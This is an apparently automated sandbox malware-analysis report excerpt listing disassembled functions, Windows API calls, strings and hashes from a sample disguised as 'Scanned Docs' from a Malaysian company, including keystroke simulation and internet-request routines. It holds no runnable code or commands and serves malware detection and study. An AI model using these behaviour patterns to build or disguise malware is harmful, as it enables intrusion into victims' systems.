                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow
                                                      • String ID:
                                                      • API String ID: 312131281-0
                                                      • Opcode ID: 1e0cd3dc9d36c122d9eee5e7e622e50e704edbd46be370d4f199a68b9eda6898
                                                      • Instruction ID: bdd79a40e9a9180a3a5c531a84d9c2dc85e7a96c216983c65dc198aff52f86df
                                                      • Opcode Fuzzy Hash: 1e0cd3dc9d36c122d9eee5e7e622e50e704edbd46be370d4f199a68b9eda6898
                                                      • Instruction Fuzzy Hash: 26618D75900248AFDB12DFA8CC81EEE77F8EB0D710F144199FA15A72A1D770AE85DB50
                                                      Function 002EB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 002EB151
                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,002EA1E1,?,00000001), ref: 002EB165
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 002EB16C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002EA1E1,?,00000001), ref: 002EB17B
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 002EB18D
                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,002EA1E1,?,00000001), ref: 002EB1A6
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002EA1E1,?,00000001), ref: 002EB1B8
                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002EA1E1,?,00000001), ref: 002EB1FD
                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,002EA1E1,?,00000001), ref: 002EB212
                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,002EA1E1,?,00000001), ref: 002EB21D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      • Opcode ID: 4a241b2b5d1991d0dbb17e2acf891cc447f19a66a30ad0f049cf23c9098d7c60
                                                      • Instruction ID: 6d0f43384c518966895e641530402358132a6bb959564e132b075fbb7038471b
                                                      • Opcode Fuzzy Hash: 4a241b2b5d1991d0dbb17e2acf891cc447f19a66a30ad0f049cf23c9098d7c60
                                                      • Instruction Fuzzy Hash: 3931BA755A0305AFDB139F25DC48BEA7BADAF14352F908004FA06CB1A0D7B49A108F64
                                                      Function 002B2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 002B2C94
                                                        • Part of subcall function 002B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000), ref: 002B29DE
                                                        • Part of subcall function 002B29C8: GetLastError.KERNEL32(00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000,00000000), ref: 002B29F0
                                                      • _free.LIBCMT ref: 002B2CA0
                                                      • _free.LIBCMT ref: 002B2CAB
                                                      • _free.LIBCMT ref: 002B2CB6
                                                      • _free.LIBCMT ref: 002B2CC1
                                                      • _free.LIBCMT ref: 002B2CCC
                                                      • _free.LIBCMT ref: 002B2CD7
                                                      • _free.LIBCMT ref: 002B2CE2
                                                      • _free.LIBCMT ref: 002B2CED
                                                      • _free.LIBCMT ref: 002B2CFB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 1e744395f883fa3a9d33623f9cf6656f6e9ac9c4027a2e9d4f3befebecdadfec
                                                      • Instruction ID: a8b8e7619b809dc2161e4ac401b8c65c8afd35d69bbc7176d2ca81616e5e9bb3
                                                      • Opcode Fuzzy Hash: 1e744395f883fa3a9d33623f9cf6656f6e9ac9c4027a2e9d4f3befebecdadfec
                                                      • Instruction Fuzzy Hash: 6D119676120608FFCB02EF54D942DDD3BA5FF05390F5158A5FA485B222DA31EA649F90
                                                      Function 00281410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00281459
                                                      • OleUninitialize.OLE32(?,00000000), ref: 002814F8
                                                      • UnregisterHotKey.USER32(?), ref: 002816DD
                                                      • DestroyWindow.USER32(?), ref: 002C24B9
                                                      • FreeLibrary.KERNEL32(?), ref: 002C251E
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 002C254B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      • Opcode ID: 85d44cd23a8a7e972365d25813b72544b67ea581123bf27a281af304eee9fb8b
                                                      • Instruction ID: 003924f85fbbde26aa26093f2090973846ecf1f46df1580253d63a6b04dc31db
                                                      • Opcode Fuzzy Hash: 85d44cd23a8a7e972365d25813b72544b67ea581123bf27a281af304eee9fb8b
                                                      • Instruction Fuzzy Hash: CED14835622212CFDB19EF14C995F69F7A8BF05740F6442ADE44AAB291DB30AC36CF50
                                                      Function 00285BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00285C7A
                                                        • Part of subcall function 00285D0A: GetClientRect.USER32(?,?), ref: 00285D30
                                                        • Part of subcall function 00285D0A: GetWindowRect.USER32(?,?), ref: 00285D71
                                                        • Part of subcall function 00285D0A: ScreenToClient.USER32(?,?), ref: 00285D99
                                                      • GetDC.USER32 ref: 002C46F5
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 002C4708
                                                      • SelectObject.GDI32(00000000,00000000), ref: 002C4716
                                                      • SelectObject.GDI32(00000000,00000000), ref: 002C472B
                                                      • ReleaseDC.USER32(?,00000000), ref: 002C4733
                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002C47C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      • API String ID: 4009187628-3372436214
                                                      • Opcode ID: 0b3c5f6e3b0f9c0a0a14dec4668abec43fbe7484aacd37d6804ffb7ee5166c5b
                                                      • Instruction ID: abe55a5e0cf58d8f82f0d3c8eee36b7c29076eed84db5da5707771a7686e42c5
                                                      • Opcode Fuzzy Hash: 0b3c5f6e3b0f9c0a0a14dec4668abec43fbe7484aacd37d6804ffb7ee5166c5b
                                                      • Instruction Fuzzy Hash: 6371D034420206DFCF22AF64C994FEA7BB5FF4A314F24436AED555A2A6C3318865DF50
                                                      Function 002F359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002F35E4
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • LoadStringW.USER32(00352390,?,00000FFF,?), ref: 002F360A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: LoadString$_wcslen
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 4099089115-2391861430
                                                      • Opcode ID: 32c0c04bb088d3357f7da3cd9955326dba88e93324760cace5321f23ffe1d2d2
                                                      • Instruction ID: 107cd45f77b53bfc47ab1dd3e51409af9579628ee2250e8c5102e9e4aa336a72
                                                      • Opcode Fuzzy Hash: 32c0c04bb088d3357f7da3cd9955326dba88e93324760cace5321f23ffe1d2d2
                                                      • Instruction Fuzzy Hash: F6515E7582120AAADF15FBA0CC42EFDBB78AF04740F144165F205721A1EB316AA5DFA1
                                                      Function 002FC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002FC272
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002FC29A
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002FC2CA
                                                      • GetLastError.KERNEL32 ref: 002FC322
                                                      • SetEvent.KERNEL32(?), ref: 002FC336
                                                      • InternetCloseHandle.WININET(00000000), ref: 002FC341
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                      • String ID:
                                                      • API String ID: 3113390036-3916222277
                                                      • Opcode ID: 64a6ef82b34244c63f44ba9a7506b67dd4445f715619a25177b83d0f7dcde178
                                                      • Instruction ID: 98878ed17e811e8e0d3a8b794023520a34dc2cdf60525f14e8399495ed2471fb
                                                      • Opcode Fuzzy Hash: 64a6ef82b34244c63f44ba9a7506b67dd4445f715619a25177b83d0f7dcde178
                                                      • Instruction Fuzzy Hash: F231A47152020CAFD7219F648E88ABBBBFCEB497C4F24852EF546D2240DB70DD149B61
                                                      Function 002E989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002C3AAF,?,?,Bad directive syntax error,0031CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 002E98BC
                                                      • LoadStringW.USER32(00000000,?,002C3AAF,?), ref: 002E98C3
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 002E9987
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                      • API String ID: 858772685-4153970271
                                                      • Opcode ID: b068f60a377c47bf48a37ab530af7c8c1ddc3d70219dc1ba34e1acb11feded47
                                                      • Instruction ID: 33fc419f8c405cff98a9f349d6d58a1a1fd59b347a2de16cb7aede7d9733ef2f
                                                      • Opcode Fuzzy Hash: b068f60a377c47bf48a37ab530af7c8c1ddc3d70219dc1ba34e1acb11feded47
                                                      • Instruction Fuzzy Hash: 5F21A03196021AABCF16EF90CC06EEE7779BF19700F04446AF515660A2EB71A6B8CF51
                                                      Function 002E209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32 ref: 002E20AB
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 002E20C0
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002E214D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1290815626-3381328864
                                                      • Opcode ID: 1955400661c33c325957f4cd8a87c74b9166a3da607f891c7d29fefb46757204
                                                      • Instruction ID: c952e083f84df0b778d3666a1f241913ac1fdbd3f8a352742facfa41fe19eb98
                                                      • Opcode Fuzzy Hash: 1955400661c33c325957f4cd8a87c74b9166a3da607f891c7d29fefb46757204
                                                      • Instruction Fuzzy Hash: AD110A766F4707FBF6026621DC06DE6779CDB15324F600016FB0AAD0E3EEA1A9255914
                                                      Function 002BCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                      • String ID:
                                                      • API String ID: 1282221369-0
                                                      • Opcode ID: a0b3d1d0da699cd25b93cda2efb6299f5384ca6d199c98f69b4bc79eaa21dc3f
                                                      • Instruction ID: d04af1f2ddf607904362d2da52ff208d89b81949b11998287a98772a393d13fa
                                                      • Opcode Fuzzy Hash: a0b3d1d0da699cd25b93cda2efb6299f5384ca6d199c98f69b4bc79eaa21dc3f
                                                      • Instruction Fuzzy Hash: 79615A71924302EFDB25AFB4D881AF97BE9EF053D0F2445AEF94497251E6329D208B90
                                                      Function 003150D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00315186
                                                      • ShowWindow.USER32(?,00000000), ref: 003151C7
                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 003151CD
                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 003151D1
                                                        • Part of subcall function 00316FBA: DeleteObject.GDI32(00000000), ref: 00316FE6
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0031520D
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0031521A
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0031524D
                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00315287
                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00315296
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                      • String ID:
                                                      • API String ID: 3210457359-0
                                                      • Opcode ID: 75038eb51af2d6ff888328d8ac41408c3a23fdbb88116d40433cba126bcdfd7d
                                                      • Instruction ID: 8759f7d7c1d1d6ab0390846f307452ecb28cb74b1b4b8bae28052601290ced41
                                                      • Opcode Fuzzy Hash: 75038eb51af2d6ff888328d8ac41408c3a23fdbb88116d40433cba126bcdfd7d
                                                      • Instruction Fuzzy Hash: 0751C431A60A08FEEF2B9F24CC45BD87B69EB8D321F148421F5159A2E0C7B599D1DB40
                                                      Function 00298B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 002D6890
                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002D68A9
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002D68B9
                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 002D68D1
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002D68F2
                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00298874,00000000,00000000,00000000,000000FF,00000000), ref: 002D6901
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 002D691E
                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00298874,00000000,00000000,00000000,000000FF,00000000), ref: 002D692D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                      • String ID:
                                                      • API String ID: 1268354404-0
                                                      • Opcode ID: 950e68e7af6900dff4482ff4f9e3acd81ac3c2890be50c1aa5853a2f925f707e
                                                      • Instruction ID: b56f02d5b089400ed3151ccd3163ab256f8955e5af34f54ef3c80438b084210f
                                                      • Opcode Fuzzy Hash: 950e68e7af6900dff4482ff4f9e3acd81ac3c2890be50c1aa5853a2f925f707e
                                                      • Instruction Fuzzy Hash: CA518A70620206AFDF21CF25CC65FAA7BB5EB48354F184519F906D72A0DB70EDA0DB50
                                                      Function 002FC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002FC182
                                                      • GetLastError.KERNEL32 ref: 002FC195
                                                      • SetEvent.KERNEL32(?), ref: 002FC1A9
                                                        • Part of subcall function 002FC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002FC272
                                                        • Part of subcall function 002FC253: GetLastError.KERNEL32 ref: 002FC322
                                                        • Part of subcall function 002FC253: SetEvent.KERNEL32(?), ref: 002FC336
                                                        • Part of subcall function 002FC253: InternetCloseHandle.WININET(00000000), ref: 002FC341
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                      • String ID:
                                                      • API String ID: 337547030-0
                                                      • Opcode ID: c4b397d6996baf44a27ed9fa0cb910517daba4e45f5b9a9119308710c585b171
                                                      • Instruction ID: c2d76732e8886ff00a058c34b753b82f70dae530858e5f6461ee2348adb494bf
                                                      • Opcode Fuzzy Hash: c4b397d6996baf44a27ed9fa0cb910517daba4e45f5b9a9119308710c585b171
                                                      • Instruction Fuzzy Hash: 6C31907116060DAFDB219FA5DE44AB7FBECFF18380B24842DFA5682610C731E824DB60
                                                      Function 002E25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 002E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 002E3A57
                                                        • Part of subcall function 002E3A3D: GetCurrentThreadId.KERNEL32 ref: 002E3A5E
                                                        • Part of subcall function 002E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002E25B3), ref: 002E3A65
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 002E25BD
                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002E25DB
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 002E25DF
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 002E25E9
                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 002E2601
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 002E2605
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 002E260F
                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 002E2623
                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 002E2627
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
